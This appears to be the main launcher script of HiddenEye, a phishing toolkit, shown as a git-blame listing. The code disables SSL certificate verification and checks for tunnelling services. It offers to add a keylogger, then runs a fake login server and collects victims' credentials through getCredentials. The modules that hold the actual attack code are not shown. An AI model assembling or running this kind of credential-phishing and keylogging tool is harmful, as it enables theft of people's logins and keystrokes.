2018-10-30 23:43:48 +08:00
|
|
|
#!/usr/bin/python3
|
2018-11-20 01:49:09 +08:00
|
|
|
#
|
2020-05-06 16:31:00 +08:00
|
|
|
# HiddenEye by https://dark-sec-official.com
|
2018-11-20 01:49:09 +08:00
|
|
|
#
|
2019-11-17 00:19:44 +08:00
|
|
|
|
|
|
|
from Defs.Languages import *
|
2020-05-06 16:58:06 +08:00
|
|
|
from Defs.Actions import cloudflarePrompt
|
2019-11-17 00:19:44 +08:00
|
|
|
from Defs.Configurations import *
|
|
|
|
from Defs.Checks import *
|
2018-10-29 03:49:19 +08:00
|
|
|
import multiprocessing
|
2018-10-31 10:28:03 +08:00
|
|
|
import gettext
|
2018-11-29 04:56:33 +08:00
|
|
|
import sys
|
2019-07-30 18:55:23 +08:00
|
|
|
import ssl
|
2019-11-17 00:19:44 +08:00
|
|
|
from os import system, environ
|
|
|
|
|
|
|
|
if(not environ.get('PYTHONHTTPSVERIFY', "") and getattr(ssl, '_create_unverified_context', None)):
|
|
|
|
ssl._create_default_https_context = ssl._create_unverified_context
|
2019-07-30 18:55:23 +08:00
|
|
|
|
2018-11-29 04:56:33 +08:00
|
|
|
|
2018-10-29 03:49:19 +08:00
|
|
|
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
|
2018-12-06 09:06:41 +08:00
|
|
|
checkPermissions()
|
2018-11-30 07:20:52 +08:00
|
|
|
installGetText()
|
2018-11-29 04:56:33 +08:00
|
|
|
languageSelector()
|
2018-10-29 03:49:19 +08:00
|
|
|
checkConnection()
|
2020-01-19 22:03:08 +08:00
|
|
|
verCheck()
|
|
|
|
checkPHP()
|
2019-10-27 16:55:31 +08:00
|
|
|
checkLocalxpose()
|
2018-10-29 03:49:19 +08:00
|
|
|
checkNgrok()
|
2020-01-08 09:18:21 +08:00
|
|
|
checkOpenport()
|
|
|
|
checkPagekite()
|
2019-11-16 16:51:49 +08:00
|
|
|
checkLT()
|
2018-10-29 03:49:19 +08:00
|
|
|
ifSettingsNotExists()
|
|
|
|
readConfig()
|
|
|
|
|
|
|
|
if __name__ == "__main__":
|
|
|
|
try:
|
|
|
|
runMainMenu()
|
2019-04-21 19:50:36 +08:00
|
|
|
mainMenu()
|
2019-11-17 00:19:44 +08:00
|
|
|
|
2019-01-28 06:41:59 +08:00
|
|
|
keyloggerprompt()
|
|
|
|
addingkeylogger()
|
2020-05-06 16:31:00 +08:00
|
|
|
cloudflarePrompt()
|
2019-11-14 19:02:29 +08:00
|
|
|
emailPrompt()
|
2018-10-29 03:49:19 +08:00
|
|
|
inputCustom()
|
2019-07-30 19:24:16 +08:00
|
|
|
port = selectPort()
|
|
|
|
|
2018-10-29 03:49:19 +08:00
|
|
|
##############
|
2019-07-30 19:24:16 +08:00
|
|
|
runServer(port)
|
|
|
|
selectServer(port)
|
2018-10-30 22:32:47 +08:00
|
|
|
|
2019-07-30 19:24:16 +08:00
|
|
|
multiprocessing.Process(target=runServer, args=(port,)).start()
|
|
|
|
getCredentials(port)
|
2018-10-29 03:49:19 +08:00
|
|
|
|
|
|
|
except KeyboardInterrupt:
|
2020-01-19 22:03:08 +08:00
|
|
|
port = '8080' # When Keyword Interrupt Occurs before defining Port by User. Script will use 8080 port.(Just To Remove Exception Errors)
|
|
|
|
endMessage(port)
|
2019-11-17 00:19:44 +08:00
|
|
|
exit()
|